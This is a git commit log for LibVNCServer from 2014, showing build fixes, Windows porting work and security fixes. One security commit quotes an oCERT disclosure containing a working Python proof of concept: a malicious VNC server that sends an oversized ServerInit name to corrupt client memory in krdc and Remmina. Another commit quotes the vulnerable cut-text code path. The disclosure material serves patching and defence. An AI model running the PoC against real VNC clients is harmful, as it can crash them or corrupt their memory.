summaryrefslogtreecommitdiffstats
Commit message (Collapse)AuthorAgeFilesLines
* Fix possible libvncclient ServerInit memory corruption.Christian Beier2014-10-101-1/+2
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | This fixes the following oCERT report (oCERT-2014-008 pt.2): There is a similar vulnerability to the previous one I sent. This is related to the ServerInit message where the width, the height of the server's framebuffer, its pixel format, and the name are sent to the client. The name can be used in a malicious manner to trigger a memory corruption in the client. Field Size --------------------------------- name-length [4] name-string [name-length] Below you will find a PoC script to show the vulnerability. This was tested on Fedora 20 with the latest version of krdc. I have noticed something, where the memory corruption causes the program to hang but allows you to try to disconnect. After this it hangs. Occasionally there will be segmentation fault in memcpy. This can become more reliable if you connect to a different VNC server first (Or the wrong port on the malicious server) then connecting to the malicious port. Every time I accidentally made the wrong VNC connection attempt the next time I connected it segfault'd. Just run the script it will listen on port 5900 and connect to it with krdc for example. I have observed Remmina crash more reliably. import socket,struct,sys HOST = "" PORT = 5900 c = socket.socket(socket.AF_INET, socket.SOCK_STREAM) c.bind((HOST,PORT)) c.listen(1) conn,addr = c.accept() print "Connected by ", addr protocolVersion3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a" conn.send(protocolVersion3008) data = conn.recv(1024) # Receive the version from them. secTypeNone = "\x01\x01" secTypeAuth = "\x01\x02" conn.send(secTypeNone) data = conn.recv(1024) # Receive the secType choice from them. secResultOk = "\x00" * 4 secResultNo = "\x00\x00\x00\x01" conn.send(secResultOk) data = conn.recv(1024) # Receive the ClientInit (Shared-flag). frameBufferWidth = 0x0480 frameBufferHeight = 0x0360 bitsPerPixel = 0x20 depth = 0x18 bigEndian = 0x1 trueColor = 0x0 redM = 0x0 greenM = 0x0 blueM = 0x0 redS = 0x0 greenS = 0x0 blueS = 0x0 padding = "\x00\x00\x00" nameLength = 0xffffffff nameString = "AA" * 0xFFFF + "\x00\x0a" conn.send( struct.pack(">HHBBBBHHHBBB",frameBufferWidth, frameBufferHeight, bitsPerPixel, depth, bigEndian, trueColor, redM, greenM, blueM, redS, greenS, blueS) + padding + struct.pack(">I", nameLength) + nameString ) c.close()
* Fix potential memory corruption in libvncclient.Christian Beier2014-10-101-0/+7
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Fixes (maybe amongst others) the following oCERT report ([oCERT-2014-008]): LibVNCServer HandleRFBServerMessage rfbServerCutText malicious msg.sct.length It looks like there may be a chance for potential memory corruption when a LibVNCServer client attempts to process a Server Cut Text message. case rfbServerCutText: { char *buffer; if (!ReadFromRFBServer(client, ((char *)&msg) + 1, sz_rfbServerCutTextMsg - 1)) return FALSE; msg.sct.length = rfbClientSwap32IfLE(msg.sct.length); << Retrieve malicious length buffer = malloc(msg.sct.length+1); << Allocate buffer. Can return 0x0 if (!ReadFromRFBServer(client, buffer, msg.sct.length)) << Attempt to write to buffer return FALSE; buffer[msg.sct.length] = 0; << Attempt to write to buffer if (client->GotXCutText) client->GotXCutText(client, buffer, msg.sct.length); << Attempt to write to buffer free(buffer); break; } If a message is provided with an extremely large size it is possible to cause the malloc to fail, further leading to an attempt to write 0x0.
* Update NEWS for 0.9.10.Christian Beier2014-10-091-0/+23
|
* Update AUTHORS.Christian Beier2014-10-091-1/+3
|
* Merge pull request #42 from LibVNC/autotools-fix-revisiteddscho2014-10-074-0/+1114
|\ | | | | Add autoconf macros that might not be installed with a usual autotools setup
| * Ship the required macros in the m4/ directory.Christian Beier2014-10-074-0/+1114
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | This is recommended practice as per https://www.gnu.org/software/automake/manual/html_node/Local-Macros.html. It fixes the problem that arose when one of the maintainers could not build LibVNCServer after https://github.com/LibVNC/libvncserver/pull/38 was merged. Symptoms included checking whether make sets $(MAKE)... yes ./configure: line 2481: syntax error near unexpected token `rfb/rfbconfig.h' ./configure: line 2481: `AX_PREFIX_CONFIG_H(rfb/rfbconfig.h)' until autoconf-archive was installed (which was a previously unmentioned requirement for Pull Request #38) – this is not always an option, in particular when the project needs to be built using a system-wide autoconf installation that cannot be modified easily by the developer.
* | Add back a working autogen.shJohannes Schindelin2014-10-071-0/+4
| | | | | | | | | | | | | | | | There was no reason to get rid of the convenient script. Most developers who are not in love with autoconf fail to remember that autoreconf invocation, therefore it is better to have something working in place. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* | Fix stack-based buffer overflowNicolas Ruff2014-10-071-1/+2
| | | | | | | | | | | | | | There was a possible buffer overflow in rfbFileTransferOffer message when processing the FileTime. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* | Merge pull request #41 from newsoft/masterdscho2014-10-072-9/+52
|\ \ | | | | | | Fixing 2 security issues
| * | Fix multiple stack-based buffer overflows in file transfer featurenewsoft2014-10-061-8/+30
| | |
| * | Make sure that no integer overflow could occur during scalingnewsoft2014-10-061-1/+22
|/ /
* | Add libvncclient/h264.c to dist tarball.Christian Beier2014-10-061-1/+1
| | | | | | | | Otherwise the sources from a 'make dist' package wouldn't compile.
* | Really add empty m4 subdirectory.Christian Beier2014-10-031-0/+1
| | | | | | | | This change kinda got lost with the last commit re-splitting.
* | Merge pull request #38 from LibVNC/autotools-fix-revisitedChristian Beier2014-10-0213-14227/+15
|\ \ | |/ | | Autotools fix revisited.
| * INSTALL and ltmain.sh need those leading slashes.Christian Beier2014-10-021-2/+2
| | | | | | | | .dirstamp, OTOH, is to be expected in several subdirectories.
| * add a few more ignoresBrian Bidulock2014-10-021-0/+3
| |
| * removed autogen.shBrian Bidulock2014-10-021-57/+0
| | | | | | | | - no longer applicable: use autoreconf -fiv
| * Remove autotools-related files that will get installed by autoreconf -i.Christian Beier2014-10-023-14161/+0
| |
| * Use an m4 script subdirectory, fix automake init and two macro names.Brian Bidulock2014-10-022-3/+6
| |
| * Rename obsolete INCLUDES to AM_CPPFLAGSBrian Bidulock2014-10-026-6/+6
| |
* | Update noVNC HTML5 client to latest version from ↵Christian Beier2014-10-0230-5951/+6797
| | | | | | | | https://github.com/kanaka/noVNC.
* | Close unclosed comments ;-)Johannes Schindelin2014-09-301-2/+2
| | | | | | | | Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* | Merge pull request #36 from danielgindi/masterdscho2014-09-301-0/+2
|\ \ | | | | | | A forgotten `#ifdef WIN32` broke UNIX build.
| * | A forgotten `#ifdef WIN32` broke UNIX build.Daniel Cohen Gindi2014-09-301-0/+2
|/ /
* | Merge pull request #33 from danielgindi/masterdscho2014-09-3014-30/+327
|\ \ | |/ |/| More MSVC adjustments, now focuses on the libvncserver
| * Signal is a fundamental UNIX function, and must be omitted for any windows ↵Daniel Cohen Gindi2014-09-201-1/+1
| | | | | | | | compilation
| * These are UNIX headers, and are not available on MSVCDaniel Cohen Gindi2014-09-201-0/+5
| |
| * Those are generally the windows headers, not just MinGWDaniel Cohen Gindi2014-09-201-2/+2
| |
| * On windows, use the Win32 calls for directory enumerations.Daniel Cohen Gindi2014-09-201-3/+78
| | | | | | | | We also do not need the conversion between UNIX values to Windows values in the RTF_FIND_DATA struct, as we already are on windows.
| * Generally adjusting headers for compiling on windows without the mixing of ↵Daniel Cohen Gindi2014-09-204-1/+19
| | | | | | | | Winsock 1 and 2.
| * Just use a macro to bridge to the Win32 version of `mkdir`Daniel Cohen Gindi2014-09-201-5/+6
| | | | | | | | The additional compat_mkdir function was not necessary at all.
| * Use correct `winsock2.h` version header instead of winsock.h.Daniel Cohen Gindi2014-09-201-2/+4
| | | | | | | | | | | | `windows.h` is referring to `winsock.h` (unless the `WIN32_LEAN_AND_MEAN` is defined). The structs used in this header are defined in `winsock2.h` or in `winsock.h`, but we are using Winsock2 of course! So we have to include winsock2.h and refrain from including windows.h here
| * Fixed a violation of the C89 standard ("declarations must come before ↵Daniel Cohen Gindi2014-09-203-10/+16
| | | | | | | | instructions")
| * A windows version for directory enumerationsDaniel Cohen Gindi2014-09-201-0/+147
| | | | | | | | Basically taken from https://github.com/danielgindi/FileDir with some adjustments
| * MSVC also has the __FUNCTION__ predefinedDaniel Cohen Gindi2014-09-201-1/+1
| |
| * `CreateDirectory` might clash with the `CreateDirectoryA`/`CreateDirectoryW` ↵Daniel Cohen Gindi2014-09-202-1/+13
| | | | | | | | macros on MSVC
| * Fail when NULL is passed to CreateFileListInfo()Daniel Cohen Gindi2014-09-201-2/+6
| | | | | | | | Passing NULL to sprintf() would most likely crash the program.
| * `strings.h` and `resolv.h` are not available on MSVC, and some POSIX ↵Daniel Cohen Gindi2014-09-206-2/+29
|/ | | | | | functions are renamed or deprecated For all of those missing/deprecated POSIX functions, we just add a macro mapping to the _underscored version of MSVC.
* The HAVE_X11 define is not there anymore, but we don't need it either.Christian Beier2014-09-091-5/+1
|
* Move vncterm to https://github.com/LibVNC/vncterm.Christian Beier2014-09-0912-1296/+2
|
* Move VisualNaCro to https://github.com/LibVNC/VisualNaCro.Christian Beier2014-09-0912-1942/+0
|
* Move prepare_x11vnc_dist.sh over to x11vnc repo.Christian Beier2014-09-091-140/+0
|
* Remove x11vnc from autotools build system.factor-out-x11vncChristian Beier2014-09-032-433/+2
|
* Remove tightvnc-1.3dev5-vncviewer-alpha-cursor.patch.Christian Beier2014-09-031-143/+0
|
* Remove x11vnc subdir.Christian Beier2014-09-03176-210670/+0
| | | | The new x11vnc repo is at https://github.com/LibVNC/x11vnc.
* Fix tv_usec calculationJohannes Schindelin2014-09-021-1/+1
| | | | | | This bug was introduced in the MSVC patches. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Merge branch 'msvc'Johannes Schindelin2014-09-0210-32/+389
|\ | | | | | | | | | | | | | | | | This topic branch provides compatibility for Windows, without the MINGW32 dependency. It is based on https://github.com/LibVNC/libvncserver/pull/22. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
| * Use Windows' critical sections to emulate pthread's mutexesDaniel Cohen Gindi2014-09-021-13/+36
| | | | | | | | | | | | | | | | | | | | | | With Microsoft Visual C++, we cannot use pthreads (MinGW sports an emulation library which is the reason we did not need Windows-specific hacks earlier). Happily, it is very easy to provide Windows-specific emulations for the pthread calls we use. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
| * Perform pointer arithmetic on char * instead of void *Daniel Cohen Gindi2014-09-021-1/+1
| | | | | | | | | | | | | | | | Microsoft Visual C++ does not allow pointer arithmetic on void pointers. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
| * MSVC: Use the Unix emulation headersDaniel Cohen Gindi2014-09-022-1/+11
| | | | | | | | | | | | [JES: provided commit message, split out unrelated changes] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
OpenPOWER on IntegriCloud